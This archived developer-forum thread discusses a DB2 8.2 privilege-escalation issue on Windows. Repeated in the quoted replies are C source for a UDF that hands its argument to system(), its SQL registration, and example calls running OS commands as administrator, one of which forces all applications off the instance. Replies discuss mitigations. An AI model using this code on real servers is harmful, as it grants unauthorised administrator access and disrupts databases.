470,594 Members | 1,120 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 470,594 developers. It's quick & easy.

Security issue with system call from C udf on Windows

Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.

Nov 30 '06 #1
3 1768
In article <11*********************@h54g2000cwb.googlegroups. com>,
4.****@mail.ru says...
Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.

You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
Nov 30 '06 #2
You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
But I can have rights to put module anywhere in the LIBPATH or PATH of
the instance owner or use absolute path for registering.
In the last case it will be enough to find any path in the server where
administrator has rights to read and I have rights to write...

Nov 30 '06 #3
4.****@mail.ru wrote:
Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?
I guess that's a very good example illustrating that the DBA should really
take care of privileges and who is allowed to created what kind of objects.
Your UDF directly exposes capabilities of the OS through SQL. You could
achieve the same with a different, more obfuscated UDF as well.

--
Knut Stolze
DB2 Information Integration Development
IBM Germany
Nov 30 '06 #4

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

29 posts views Thread by Patrick | last post: by
19 posts views Thread by Diego F. | last post: by
reply views Thread by gxl034000 | last post: by
3 posts views Thread by =?Utf-8?B?dG9ieQ==?= | last post: by
reply views Thread by =?Utf-8?B?TGFycnlLdXBlcm1hbg==?= | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.